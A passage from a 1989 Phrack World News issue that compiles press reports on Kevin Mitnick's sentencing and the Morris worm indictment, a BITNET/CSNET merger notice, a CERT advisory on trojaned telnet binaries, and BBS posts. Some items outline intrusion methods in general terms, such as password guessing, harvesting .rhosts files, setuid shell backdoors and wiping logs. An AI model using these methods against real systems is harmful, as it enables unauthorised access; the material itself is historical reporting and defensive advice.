  2888. The idea that a computer "junkie" who cannot control his urge to
  2889. break into computers could be helped with a program similar to
  2890. Alcoholics Anonymous is a new one, Harriet Rossetto, director of
  2891. the treatment program, told the judge.
  2892.  
  2893. "His behavior is an impulse disorder," Rossetto said.  "The
  2894. disease is the addiction, whether it be drugs, alcohol, gambling,
  2895. hacking, money or power."
  2896.  
  2897. Rossetto, who was contacted by Mitnick's family, said Mitnick
  2898. would be the first person addicted to computer crime to be
  2899. treated in the Bet T'shuvah program , a 20-bed residential
  2900. treatment program for Jewish criminal offenders.
  2901.  
  2902. "It's not willful conduct, what Kevin does," she said.  "He's
  2903. tried to control his behavior but hacking gives him a sense of
  2904. power, makes him feel like somebody when he's depressed or he's
  2905. lost a job."
  2906.  
  2907. Mitnick, age 25, has been in federal prison for seven months
  2908. since his arrest
  2909. last December on computer fraud charges.
  2910.  
  2911. He pleaded guilty in May to possessing 16 unauthorized MCI
  2912. long-distance codes and to stealing a computer security program
  2913. from the Digital Equipment Corporation in Massachusetts.
  2914.  
  2915. Mitnick has been described in court as a computer whiz who could
  2916. break into secured systems and change telephone or school records
  2917. at will.  He told the judge on Monday, July 17 that he wants to
  2918. stop hacking.
  2919.  
  2920. "I sincerely want to change my life around and be productive
  2921. rather than destructive," Mitnick said.
  2922.  
  2923. "With counseling to break the addictive pattern I feel I have
  2924. towards computer hacking, I can take an active role and I don't
  2925. have to have the compulsive behavior again."
  2926.  
  2927. Assistant U.S. Attorney James R. Asperger said that the
  2928. government does not oppose Mitnick's release from prison to be
  2929. treated at Bet T'shuvah.
  2930.  
  2931. "The judge has taken this case very seriously.  It shows computer
  2932. hacking is not like a Nintendo game," Asperger said.
  2933.  
  2934. Mitnick has cooperated with FBI investigators since his pleaded
  2935. guilty and helped bring charges against his former best friend,
  2936. Leonard DiCicco, 23, of Calabasas, Asperger said.
  2937.  
  2938. DiCicco, who initially tipped the FBI to Mitnick's crimes, has
  2939. agreed to plead guilty to a charge of aiding and abetting the
  2940. transportation of a stolen computer program.
  2941.  
  2942. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  2943.  
  2944. Authorities Backed Away From Original Allegations
  2945. July 23, 1989
  2946. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  2947. by Karen E. Klein (New York Times)
  2948.  
  2949. LOS ANGELES -- Shortly after computer hacker Kevin Mitnick was
  2950. arrested last December (1988), he was characterized as an extreme
  2951. threat who could wreak electronic chaos if he got near so much as
  2952. a telephone without supervision.
  2953.  
  2954. Police and FBI agents started trying to corroborate the flurry of
  2955. rumors that arose about the malicious actions of the computer
  2956. whiz from suburban Panorama City, whose case attracted national
  2957. attention.
  2958.  
  2959. Three judges denied Mitnick, age 25, bail on the ground that he
  2960. was a danger to society and ordered him held in a high-security
  2961. jail cell.
  2962.  
  2963. But after separating the Mitnick myth from the reality,
  2964. authorities backed away from many of their original allegations.
  2965.  
  2966. "A lot of the stories we originally heard just didn't pan out, so
  2967. we had to give him the benefit of the doubt," said James R.
  2968. Asperger, the assistant U.S. attorney who handled Mitnick's case.
  2969.  
  2970. Mitnick, pudgy and nervous, appeared in court last week to
  2971. apologize for his crimes and to ask for treatment to help break
  2972. his compulsive "addiction" to computers.
  2973.  
  2974. U.S. District Judge Mariana R. Pfaelzer sentenced him to serve
  2975. one year in
  2976. prison -- including the nearly eight months he already has served
  2977. -- and then to undergo six months of counseling and treatment
  2978. similar to that given to alcoholics or drug addicts.
  2979.  
  2980. "I think he has problems that would benefit greatly from this
  2981. kind of therapy," Pfaelzer said.  "I want him to spend as much
  2982. time as possible in counseling."
  2983.  
  2984. The case that began with a bang ended with Asperger pointing out
  2985. that the one-year prison term is the stiffest sentence ever
  2986. handed out in a computer fraud case.
  2987.  
  2988. Mitnick originally was accused of using unauthorized MCI
  2989. long-distance codes to tap into Leeds University computers in
  2990. England and of stealing a $4 million computer security system
  2991. from the Digital Equipment Corporation in Massachusetts.
  2992.  
  2993. He ultimately agreed to plead guilty to possessing 16
  2994. unauthorized MCI long-distance codes and to stealing the computer
  2995. security program.  The other charges were dismissed.
  2996.  
  2997. Alan Rubin, Mitnick's lawyer, said he felt vindicated by the
  2998. outcome of the case.
  2999.  
  3000. Rubin contended from the start that computerphobia and adolescent
  3001. exaggeration led authorities to mistakenly brand Mitnick a
  3002. malicious criminal.
  3003.  
  3004. "Once the snowball starts rolling, you can't stop it," said
  3005. Rubin, who waged an unsuccessful campaign up to the federal
  3006. appeals court to get bail for his client.
  3007.  
  3008. Far from being serious, Rubin said, Mitnick's actions were mostly
  3009. immature, adolescent pranks.
  3010.  
  3011. He pointed to evidence that Mitnick was able to electronically
  3012. cut off telephone service to people he was angry with and once
  3013. sent an enemy a $30,000 hospital telephone bill.
  3014.  
  3015. "It was the computer equivalent of sending your friend 14
  3016. pizzas," he said.
  3017.  
  3018. Many of the legends surrounding Mitnick came from the subculture
  3019. of computer hackers -- and specifically from a man who was once
  3020. Mitnick's best friend, Leonard Mitchell DiCicco, age 23, of
  3021. Calabasas, California.
  3022.  
  3023. DiCicco, who had a falling out with Mitnick over a $100 bet, told
  3024. computer security specialists at the Digital Equipment
  3025. Corporation that Mitnick had been trespassing on their system.
  3026.  
  3027. They in turn contacted the FBI agents, who arrested Mitnick.
  3028.  
  3029. What DiCicco told investigators may or may not have been entirely
  3030. truthful, Rubin said.
  3031.  
  3032. "I have no idea what his motives were," Rubin said.
  3033.  
  3034. But DiCicco, who alerted authorities to Mitnick's crime, had the
  3035. tables turned on him after the government refused to grant him
  3036. absolute immunity for his testimony against Mitnick.
  3037.  
  3038. When the prosecution said they might charge him with a crime,
  3039. DiCicco clammed up and refused to cooperate any further.  But
  3040. from his prison cell, Mitnick agreed to cooperate and provided
  3041. enough incriminating evidence for the government to charge
  3042. DiCicco.
  3043.  
  3044. DiCicco is expected to plead guilty to a charge of aiding and
  3045. abetting the interstate transportation of stolen property -- the
  3046. computer security program -- on Monday.
  3047.  
  3048. Asperger said he was not sure whether DiCicco would get a
  3049. sentence similar to Mitnick's.
  3050.  
  3051. "Although they were friends and partners in computer hacking,
  3052. (DiCicco) appeared to play a subordinate role (in the crime),"
  3053. Asperger said.
  3054.  
  3055. Other rumors about Mitnick's conduct came from fellow hackers,
  3056. who may have blown the stories out of proportion.
  3057.  
  3058. "It's a very strange sub-culture, with a lot of jealousies,"
  3059. Rubin said.  "Part of it is bragging about how macho you are and
  3060. what systems you've broken into.  It's very immature in a lot of
  3061. ways."
  3062.  
  3063. But prosecutors, citing Mitnick's various scrapes with computer
  3064. misconduct since he was 13, aren't willing to let him off the
  3065. hook entirely.
  3066.  
  3067. "I think there's some substance to these things (the rumors that
  3068. arose in Mitnick's case), an awful lot of them," said Los Angeles
  3069. FBI chief Lawrence Lawler, who is a computer buff himself and
  3070. followed Mitnick's case closely.
  3071.  
  3072. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  3073.  
  3074. If you are looking for other articles about Kevin David Mitnick aka Condor
  3075. please refer to;
  3076.  
  3077. "Pacific Bell Means Business"                     (10/06/88) PWN XXI. . .Part 1
  3078. "Dangerous Hacker Is Captured"                    (No Date ) PWN XXII . .Part 1
  3079. "Ex-Computer Whiz Kid Held On New Fraud Counts"   (12/16/88) PWN XXII . .Part 1
  3080. "Dangerous Keyboard Artist"                       (12/20/88) PWN XXII . .Part 1
  3081. "Armed With A Keyboard And Considered Dangerous"  (12/28/88) PWN XXIII. .Part 1
  3082. "Dark Side Hacker Seen As Electronic Terrorist"   (01/08/89) PWN XXIII. .Part 1
  3083. "Mitnick Plea Bargains"                           (03/16/89) PWN XXV. . .Part 1
  3084. "Mitnick Plea Bargain Rejected As Too Lenient"    (04/25/89) PWN XXVII. .Part 1
  3085. "Computer Hacker Working On Another Plea Bargain" (05/06/89) PWN XXVII. .Part 1
  3086. "Mitnick Update"                                  (05/10/89) PWN XXVII. .Part 1
  3087. "Kenneth Siani Speaks Out About Kevin Mitnick"    (05/23/89) PWN XXVII. .Part 1
  3088. _______________________________________________________________________________
  3089.  
  3090. BITNET/CSNET Announce Merger and Formation of CREN              August 18, 1989
  3091. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Washington, DC
  3092. -- Two of the nation's leading academic and research computer
  3093. networks announced today that final steps are being taken to
  3094. merge their organizations.
  3095.  
  3096. Ira Fuchs, President of BITNET, and Bernard Galler, Chairman of
  3097. CSNET, jointly reported that the two networks, which together
  3098. include 600 colleges, universities, government agencies, and
  3099. private sector research organizations, will unite to form the
  3100. Corporation for Research and Educational Networking, CREN.
  3101.  
  3102. Galler, a Professor of Electrical Engineering and Computer
  3103. Science at the University of Michigan, commented:  "The aims of
  3104. CSNET and BITNET -- to support and promote the use of computer
  3105. networks on campuses and within research organizations -- have
  3106. converged over the last several years.  We believe that by
  3107. bringing these two networks into a single organization, we will
  3108. be able to provide better service to our network users and more
  3109. effectively participate in the fast-changing national network
  3110. environment."
  3111.  
  3112. Fuchs, Vice President for Computing and Information Technology at
  3113. Princeton University, sees the move as a strengthening factor:
  3114. "The need for campus networks and the introduction of new
  3115. technology make it necessary to build a common base of network
  3116. services using the most progressive technology available.  By
  3117. eliminating overlap between our two organizations, we will
  3118. become more efficient, and more importantly, we can take a
  3119. stronger role in the the formation of the national education and
  3120. research network.  We can achieve this goal faster and at lower
  3121. cost by leveraging the efforts of the two major academic
  3122. networking organizations."
  3123.  
  3124. The merger of CSNET and BITNET has been studied for more than a
  3125. year by a planning group consisting of representatives from both
  3126. networks.  CSNET currently lists 145 institutional and corporate
  3127. members, and BITNET 480 members.  Together, the two networks
  3128. cover all 50 states and 32 foreign countries, including Japan,
  3129. Brazil, Mexico, and Argentina.  Both maintain gateways to EARN
  3130. (European Academic Research Network), NetNorth (Canada), and the
  3131. National Internet.
  3132.  
  3133. The planning group's recommendations to merge were approved by
  3134. the BITNET, Inc.  Trustees and the Directors of the University
  3135. Corporation for Atmospheric Research, operators of CSNET for the
  3136. last five years.  An information packet on the merger is being
  3137. mailed to all members of both networks this week, with a ballot
  3138. for BITNET members, who must approve the final legal steps under
  3139. the provisions of BITNET By-Laws.  In an advisory vote last
  3140. winter, BITNET members approved the merger in principle by more
  3141. than 90% of those voting.
  3142.  
  3143. A gradual transition period is planned to bring together CSNET
  3144. and BITNET services.  CREN plans to continue use of EDUCOM and
  3145. Bolt, Beranek and Newman (BBN) to provide technical and general
  3146. management services to its members.
  3147.  
  3148. EDUCOM President Kenneth M. King commented, "We are entering a
  3149. particularly challenging period in the creation of an advanced
  3150. national network infrastructure for research and education.  CREN
  3151. will play a major role in the future of these computer networks,
  3152. which are becoming more and more important to the conduct of
  3153. research and the quality of education.  EDUCOM is pleased to have
  3154. an opportunity to support the services and activities of CREN. "
  3155.  
  3156. Frank Heart, Senior Vice President, BBN Systems and Technologies
  3157. Corporation, said, "In keeping with its long involvement in the
  3158. development of networking technologies, BBN is pleased to play a
  3159. major supporting role in the evolution of BITNET and CSNET."
  3160.  
  3161. The proposed CREN Board includes Fuchs and Galler;
  3162.  
  3163. Douglas Bigelow. . . . . Wesleyan University
  3164. William Curtis . . . . . University Corporation for Atmospheric Research
  3165. David Farber . . . . . . University of Pennsylvania
  3166. Suzanne Johnson. . . . . INTEL Corporation
  3167. Mark Laubach . . . . . . Hewlett-Packard Corporation
  3168. Philip Long. . . . . . . Yale University
  3169. Dennis Ritchie . . . . . AT&T Bell Laboratories
  3170. Martin Solomon . . . . . University of South Carolina
  3171. Douglas Van Houweling. . University of Michigan
  3172. William Yundt. . . . . . Stanford University
  3173.  
  3174. For more information, contact
  3175.  
  3176.               Corporation for Research and Educational Networking
  3177.                                    Suite 600
  3178.                               1112 16th Street NW
  3179.                              Washington, DC  20036
  3180.  
  3181.                                 (202) 872-4215
  3182.  
  3183.               [Obviously they decided not to call it ONEnet --KL]
  3184. _______________________________________________________________________________
  3185.  
  3186. CERT Internet Security Advisory                                 August 16, 1989
  3187. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3188. >From Kenneth R. van Wyk
  3189.  
  3190. Many computers connected to the Internet have recently
  3191. experienced unauthorized system activity.  Investigation shows
  3192. that the activity has occurred for several months and is
  3193. spreading.  Several UNIX computers have had their "telnet"
  3194. programs illicitly replaced with versions of "telnet" which log
  3195. outgoing login sessions (including usernames and passwords to
  3196. remote systems).  It appears that access has been gained to many
  3197. of the machines which have appeared in some of these session
  3198. logs.  (As a first step, frequent telnet users should change
  3199. their passwords immediately.)  While there is no cause for panic,
  3200. there are a number of things that system administrators can do to
  3201. detect whether the security on their machines has been
  3202. compromised using this approach and to tighten security on their
  3203. systems where necessary.  At a minimum, all UNIX site
  3204. administrators should do the following:
  3205.  
  3206. o Test telnet for unauthorized changes by using the UNIX
  3207.   "strings" command to search for path/filenames of possible log
  3208.   files.  Affected sites have noticed that their telnet programs
  3209.   were logging information in user accounts under directory names
  3210.   such as "..." and ".mail".
  3211.  
  3212. In general, we suggest that site administrators be attentive to
  3213. configuration management issues.  These include the following:
  3214.  
  3215.  
  3216. o Test authenticity of critical programs - Any program with
  3217.   access to the network (e.g., the TCP/IP suite) or with access
  3218.   to usernames and passwords should be periodically tested for
  3219.   unauthorized changes.  Such a test can be done by comparing
  3220.   checksums of on-line copies of these programs to checksums of
  3221.   original copies.  (Checksums can be calculated with the UNIX
  3222.   "sum" command.)  Alternatively, these programs can be
  3223.   periodically reloaded from original tapes.
  3224.  
  3225. o Privileged programs - Programs that grant privileges to users
  3226.   (e.g., setuid root programs/shells in UNIX) can be exploited to
  3227.   gain unrestricted access to systems.  System administrators
  3228.   should watch for such programs being placed in places such as
  3229.   /tmp and /usr/tmp (on UNIX systems).  A common malicious
  3230.   practice is to place a setuid shell (sh or csh) in the /tmp
  3231.   directory, thus creating a "back door" whereby any user can
  3232.   gain privileged system access.
  3233.  
  3234. o Monitor system logs - System access logs should be periodically
  3235.   scanned (e.g., via UNIX "last" command) for suspicious or
  3236.   unlikely system activity.
  3237.  
  3238. o Terminal servers - Terminal servers with unrestricted network
  3239.   access (that is, terminal servers which allow users to connect
  3240.   to and from any system on the Internet) are frequently used to
  3241.   camouflage network connections, making it difficult to track
  3242.   unauthorized activity.  Most popular terminal servers can be
  3243.   configured to restrict network access to and from local hosts.
  3244.  
  3245. o Passwords - Guest accounts and accounts with trivial passwords
  3246.   (e.g., username=password, password=none) are common targets.
  3247.   System administrators should make sure that all accounts are
  3248.   password protected and encourage users to use acceptable
  3249.   passwords as well as to change their passwords periodically, as
  3250.   a general practice.  For more information on passwords, see
  3251.   Federal Information Processing Standard Publication (FIPS PUB)
  3252.   112, available from the National Technical Information Service,
  3253.   U.S. Department of Commerce, Springfield, VA 22161.
  3254.  
  3255. o Anonymous file transfer - Unrestricted file transfer access to
  3256.   a system can be exploited to obtain sensitive files such as the
  3257.   UNIX /etc/passwd file.  If used, TFTP (Trivial File Transfer
  3258.   Protocol - which requires no username/password authentication)
  3259.   should always be configured to run as a non-privileged user and
  3260.   "chroot" to a file structure where the remote user cannot
  3261.   transfer the system /etc/passwd file.  Anonymous FTP, too,
  3262.   should not allow the remote user to access this file, or any
  3263.   other critical system file.  Configuring these facilities to
  3264.   "chroot" limits file access to a localized directory structure.
  3265.  
  3266. o Apply fixes - Many of the old "holes" in UNIX have been closed.
  3267.   Check with your vendor and install all of the latest fixes.
  3268.  
  3269. If system administrators do discover any unauthorized system
  3270. activity, they are urged to contact the Computer Emergency
  3271. Response Team (CERT).
  3272.  
  3273. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  3274. - - - - - - -
  3275.  
  3276. Internet Cracker On The Loose:  Who Is He?
  3277. October 2, 1989 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ There
  3278. is a cracker on the loose in the Internet.  This is the
  3279. information made public so far.  Traces of the cracker were found
  3280. at the Institute for Advanced Studies in Princeton.  He also left
  3281. traces at one of the Super computer centers.  Both CERT and the
  3282. FBI have been called.
  3283.  
  3284. The technique that is being used is as follows:
  3285.  
  3286. 1) He has a modified telnet that tries a list passwords on
  3287.    accounts.  Username forwards and backwards, username + pw,
  3288.    etc.
  3289.  
  3290. 2) He seems to have a program call "ret", that is breaking into
  3291. root.
  3292.  
  3293. 3) He seems to be getting a list of victim machines via people's
  3294. .rhosts files.
  3295.  
  3296. 4) He copies password files to the machines that he is currently
  3297. working from.
  3298.  
  3299. 5) He is good about cleaning up after himself.  He zeros out log
  3300.    files and other traces of himself.
  3301.  
  3302. 6) The breakins are occurring between 10 PM Sunday nights and 8
  3303.    AM Monday mornings.
  3304.  
  3305. 7) He seems to bring along a text file of security holes to the
  3306.    machines he breaks into.
  3307.  
  3308. 8) Backtracing the network connections seem to point to the
  3309.    Boston area as a base of operations.
  3310.  
  3311. The system administrator at IAS found a directory with the name
  3312. "..  " (dot dot space space).  The files mentioned above were
  3313. found in this directory.
  3314. _______________________________________________________________________________
  3315.  
  3316. Worried Firms Pay Hush Money To "Hackers"                         June 12, 1989
  3317. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3318. By Richard Caseby (London Times)
  3319.  
  3320.             "Are London Firms Offering Amnesty To Hacker Thieves?"
  3321.  
  3322. Firms in the City of London are buying the silence of hackers who
  3323. break into their computers and steal millions of pounds.
  3324.  
  3325. At least six London firms have signed agreements with criminals,
  3326. offering them amnesty if they return part of the money.  The
  3327. firms fear that if they prosecute they will lose business when
  3328. customers learn that their computer security is flawed.
  3329.  
  3330. In several of the case the losses exceeded 1 million pounds, but
  3331. only a tenth of the total was returned.
  3332.  
  3333. The Computer Industry Research Unit (CIRU) which uncovered the deals and which
  3334. is advising the Department of Trade and Industry in data security, believes the
  3335. practice of offering amnesties is widespread.
  3336.  
  3337. "Companies who feel vulnerable are running scared by agreeing to these immoral
  3338. deals.  Their selfishness is storing up serious problems for everyone else,"
  3339. said Peter Nancarrow, a senior consultant.
  3340.  
  3341. Police have warned that deals struck with criminals could
  3342. possibly lead to an employer being prosecuted for perverting the
  3343. course of justice.
  3344.  
  3345. Detective Inspector John Austin, of Scotland Yard's computer
  3346. fraud squad, said, "Employers could find themselves in very deep
  3347. water by such strenuous efforts to protect the credibility of
  3348. their image."
  3349.  
  3350. Legal experts say the firms are making use of section five of the
  3351. Criminal Law Act 1967 which allows them to keep silent on crimes
  3352. and privately agree on compensation.  However, an employer
  3353. becomes a witness to the offense by taking evidence from a
  3354. criminal when the deal is drawn up.
  3355.  
  3356. Hackers steal by electronically transferring funds or by
  3357. programming a computer to round off all transactions by a tiny
  3358. amount and diverting the money to a separate account.
  3359.  
  3360. In one case, an assistant programmer at a merchant bank diverted
  3361. 8 million pounds to a Swiss bank account and then gave back 7
  3362. million in return for a non-disclosure agreement protecting him
  3363. against prosecution.
  3364.  
  3365. Such thefts have spread alarm throughout London, with consultants
  3366. offering to penetrate the computer networks of banks and finance
  3367. houses to pinpoint loopholes before a hacker does.
  3368.  
  3369. The biggest contracts cost up to 50,000 pounds and can involve a
  3370. four month investigation in which every weakness is explored.
  3371.  
  3372. Detectives have found that computer security at many London
  3373. institutions is riddled with loopholes.  A city of London police
  3374. operation, codenamed Comcheck, revealed wide spread weaknesses.
  3375. Firms were asked to track the number of unauthorized logons over
  3376. Easter bank holiday.
  3377.  
  3378. Some companies unable to tell whether hackers had penetrated
  3379. their network, while others lacked any security defenses.
  3380.  
  3381. In addition to theft, companies are vulnerable to blackmail.
  3382. Hackers can threaten to sabotage computers by inserting "viruses"
  3383. and "logic bombs" --rogue programs which can paralyze a system.
  3384.  
  3385. This type of threat has prompted the offer of a new insurance
  3386. policy underwritten by Lloyd's which specifically covers viruses
  3387. and other computer catastrophes.
  3388. ______________________________________________________________________
  3389.  
  3390.                                 ==Phrack Inc.==
  3391.  
  3392.                     Volume Three, Issue 28, File #10 of 12
  3393.  
  3394.             PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  3395.             PWN                                                 PWN
  3396.             PWN        P h r a c k   W o r l d   N e w s        PWN
  3397.             PWN        ~~~~~~~~~~~   ~~~~~~~~~   ~~~~~~~        PWN
  3398.             PWN               Issue XXVIII/Part 2               PWN
  3399.             PWN                                                 PWN
  3400.             PWN                 October 7, 1989                 PWN
  3401.             PWN                                                 PWN
  3402.             PWN          Created, Written, and Edited           PWN
  3403.             PWN               by Knight Lightning               PWN
  3404.             PWN                                                 PWN
  3405.             PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  3406.  
  3407.  
  3408. Grand Jury Indicts Student For Crippling Nationwide Computer Network    7/26/89
  3409. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3410. by John Markoff (New York Times)
  3411.  
  3412. After more than eight months of delay, the Justice Department said Wednesday
  3413. that a federal grand jury in Syracuse, N.Y., had indicted the 24-year-old
  3414. Cornell University graduate student who has been blamed for crippling a
  3415. nationwide computer network with a rogue software program.
  3416.  
  3417. The student, Robert Tappan Morris, was charged with a single felony count under
  3418. a 1986 computer crimes law, the Computer Fraud and Abuse Act.  Justice
  3419. Department officials said the indictment was the first under a provision of the
  3420. law that makes it illegal to gain unauthorized access to federal computers.
  3421.  
  3422. A spokesman for the Justice Department said Wednesday that the indictment had
  3423. been delayed simply because of the time taken to develop evidence.
  3424.  
  3425. But legal experts familiar with the case said the department had been stalled
  3426. in efforts to prosecute Morris because of an internal debate over whether it
  3427. might be impossible to prove the charges.  Under the 1986 law, prosecutors must
  3428. show that Morris intended to cripple the computer network.
  3429.  
  3430. As a result of this concern, the U.S. attorney in Syracuse, Frederick J.
  3431. Scullin Jr., had considered a plea bargain in which Morris would have pleaded
  3432. guilty to a misdemeanor charge.  This approach was apparently resisted,
  3433. however, by Scullin's superiors in Washington, who wanted to send a clear
  3434. signal about the seriousness of computer crime.
  3435.  
  3436. Three bills now pending before Congress would make it easier than with the 1986
  3437. law to prosecute malicious invasion of computer systems.
  3438.  
  3439. The indictment charges that Morris was the author of a computer program that
  3440. swept through a national network composed of more than 60,000 computers
  3441. November 2, 1988 jamming as many as 6,000 machines at universities, research
  3442. centers and military installations.
  3443.  
  3444. The software, which computer hackers call a "virus," was supposed to hide
  3445. silently in the computer network, two of Morris' college friends said, but
  3446. because of a programming error it multiplied wildly out of control.  The
  3447. friends said Morris' idea had been to simply to prove that he could bypass the
  3448. security protection of the network.
  3449.  
  3450. According to Wednesday's indictment, Morris gained unauthorized access to
  3451. computers at the National Aeronautics and Space Administration's Ames Research
  3452. Center in Moffett Field, California; the U.S. Air Force Logistics Command at
  3453. Wright Patterson Air Force Base in Dayton, Ohio; the University of California
  3454. at Berkeley, and Purdue University.
  3455.  
  3456. The indictment charges that the program shut down numerous computers and
  3457. prevented their use.  It charges Morris with causing "substantial damage" at
  3458. many computer centers resulting from the loss of service and the expense
  3459. incurred diagnosing the program.
  3460.  
  3461. The felony count carries a maximum penalty of five years in prison and a fine
  3462. of $250,000, in addition to which the convicted person can be ordered to pay
  3463. restitution to those affected by his program.
  3464.  
  3465. Morris' lawyer, Thomas A. Guidoboni, said his client intended to plead not
  3466. guilty.  Morris, who now lives in the Boston area, was scheduled to be
  3467. arraigned on Wednesday, August 2, before Gustave J. DiBianco, a U.S. magistrate
  3468. in Syracuse.
  3469.  
  3470. Morris' father, Robert, the chief scientist for the National Security Agency,
  3471. said the family planned to stand behind their son.  "We're distressed to hear
  3472. of the indictment," he said.
  3473.  
  3474. After realizing that his program had run amok, Morris went to his family home
  3475. in Arnold, Maryland, and later met with Justice Department officials.
  3476.  
  3477. The 1986 law was the first broad federal attempt to address the problem of
  3478. computer crime.  Morris is charged with gaining unauthorized access to
  3479. computers, preventing authorized access by others and causing more than $1,000
  3480. in damage.
  3481.  
  3482. The incident raised fundamental questions about the security of the nation's
  3483. computers and renewed debate over the who should be responsible for protecting
  3484. the nation's non-military computer systems.
  3485.  
  3486. Last year Congress settled a debate between the National Security Agency and
  3487. the National Institute of Standards and Technology by giving authority over
  3488. non-military systems to the civilian agency.
  3489.  
  3490. Last week, however, a General Accounting Office report based on an
  3491. investigation of the incident recommended that the Office of Science and
  3492. Technology Policy coordinate the establishment of an interagency group to
  3493. address computer network security.
  3494.  
  3495. The incident has also bitterly divided computer scientists and computer
  3496. security experts around the country.  Some have said they believe that "an
  3497. example" should be made of Morris to discourage future tampering with computer
  3498. networks.
  3499.  
  3500. Others, however, have argued that Morris performed a valuable service by
  3501. alerting the nation to the laxity of computer security controls.
  3502.  
  3503. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  3504.  
  3505. Other articles about Robert Tappan Morris, Jr. and the Internet Worm are;
  3506.  
  3507. "Computer Network Disrupted By 'Virus'"          (11/03/88) PWN XXII  -Part 2
  3508. "Virus Attack"                                   (11/06/88) PWN XXII  -Part 2
  3509. "The Computer Jam:  How It Came About"           (11/08/88) PWN XXII  -Part 2
  3510. "US Is Moving To Restrict {...} Virus"           (11/11/88) PWN XXII  -Part 2 *
  3511. "FBI Studies Possible Charges In Virus"          (11/12/88) PWN XXII  -Part 2
  3512. "Big Guns Take Aim At Virus"                     (11/21/88) PWN XXII  -Part 3
  3513. "Congressman Plan Hearings On Virus"             (11/27/88) PWN XXII  -Part 3
  3514. "Pentagon Severs Military {...} Virus"           (11/30/88) PWN XXII  -Part 3 *
  3515. "Networks Of Computers At Risk From Invaders"    (12/03/88) PWN XXII  -Part 4 *
  3516. "Computer Virus Eradication Act of 1988"         (12/05/88) PWN XXII  -Part 4 *
  3517. "Breaking Into Computers {...}, Pure and Simple" (12/04/88) PWN XXIV  -Part 1 *
  3518. "Cornell Panel Concludes Morris {...} Virus"     (04/06/89) PWN XXVI  -Part 1
  3519. "Robert T. Morris Suspended From Cornell"        (05/25/89) PWN XXVII -Part 2
  3520. "Justice Department Wary In Computer Case"       (05/28/89) PWN XXVII -Part 2
  3521.  
  3522. * - Indicates that the article was not directly related to Robert Morris, but
  3523.     did discuss him as well as the Internet Worm incident.
  3524. _______________________________________________________________________________
  3525.  
  3526. The Free World Incident                                            July 5, 1989
  3527. ~~~~~~~~~~~~~~~~~~~~~~~
  3528. Special Thanks to Brew Associates of Phortune 500
  3529.  
  3530.                [Some articles edited for this presentation --KL]
  3531.  
  3532. Numb: 84 of 98                7/2/89 at 8:56 pm
  3533. Subj: ...
  3534. Sect: General Messages
  3535. From: Major Havoc
  3536.  
  3537. Here is the story...
  3538.  
  3539. Evidently, someone got into Chesapeake & Potomac's (C&P) computer systems, and
  3540. added call forwarding to the telephone line that the Free World is being run
  3541. on.  It was not done through social engineering, because there was not an order
  3542. pending on my line.  Therefore, I had "free" call waiting on my line.
  3543.  
  3544. What the individual who did this does not realize is that service cannot be
  3545. changed on my line unless it is typical service, because because my father is a
  3546. retired VP from C&P.
  3547.  
  3548. The phone lines at this location are paid for by C&P, so the only way that the
  3549. service on these lines could have been changed is directly via the C&P computer
  3550. systems.  I had a long talk with C&P security, and they know who the individual
  3551. was that made the changes in the system.  My parents (since I do not even
  3552. really live here anymore) are supposed to be signing papers that will have this
  3553. individual prosecuted sometime next week, because he was foolish enough to
  3554. leave something for them to track down.
  3555.  
  3556. My guess is that it was someone who was denied access to the system that has
  3557. some type of grudge to hold or something.  I will have the pleasure of seeing
  3558. this individual serve time, if they are not a minor.
  3559.  
  3560. C&P Security questioned me in person and asked me if I had any information on
  3561. different incidents concerning central office burglaries or theft of C&P
  3562. property.  Some of you may be getting a BIG surprise REAL soon.
  3563.  
  3564. The bottom line is that I am not going to put up with this hassle much longer.
  3565. The mere fact that I am under possible investigation for something that I am
  3566. not involved with is really starting to get me upset.  I am 20 years old, and I
  3567. have a nice 32K salary job, and I am not going to tolerate these situations any
  3568. longer.  I have been doing this for so long, that it is about time that I got
  3569. some kind of recognition, and not more grief from a bunch of worthless
  3570. Christmas modemers.
  3571.  
  3572. Shape up or pay the consequences.
  3573.  
  3574.                                                                 -Major Havoc
  3575.  
  3576. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  3577.  
  3578. Numb: 86 of 98                7/2/89 at 11:54 pm
  3579. Subj: Hmm..
  3580. Sect: General Messages
  3581. From: Weatherman
  3582.  
  3583. I would do the same thing.  If some guy thinks he is being really slick and
  3584. does something like that just to cause trouble, they deserve a rude awakening
  3585. to real life.  Keep us posted on the situation.  I can see your point as to
  3586. your job and age and everything since I am in the same boat.  I am not going to
  3587. sacrifice my future life for any reason.  Unfortunately, I don't make 32k yet.
  3588.  
  3589.                                                         \%\%eatherman
  3590.  
  3591. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  3592.  
  3593. Numb: 87 of 98                7/3/89 at 12:07 pm
  3594. Subj: Umm...
  3595. Sect: General Messages
  3596. From: Lost Carrier
  3597.  
  3598. Major Havoc -- The only part of your message I am concerned about is "I had a
  3599. long talk with C&P security and a lot of you will be in for a big surpirse," or
  3600. something to that effect.  I hate surprises.  Which of us?     heh.
  3601.  
  3602.                                                                 LC, 2af
  3603.  
  3604. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  3605.  
  3606. Numb: 89 of 98                7/3/89 at 4:03 pm
  3607. Subj: ....
  3608. Sect: General Messages
  3609. From: Raving Lunatic
  3610.  
  3611. I am shocked.  Major Havoc turning people in?  About time, I guess it takes
  3612. income and responsibilities for most geeks to grow up and I am glad Havoc is not
  3613. going to tolerate it.  Would be interesting to at least hear the alias(es) of
  3614. the people/person that did the forwarding.
  3615.  
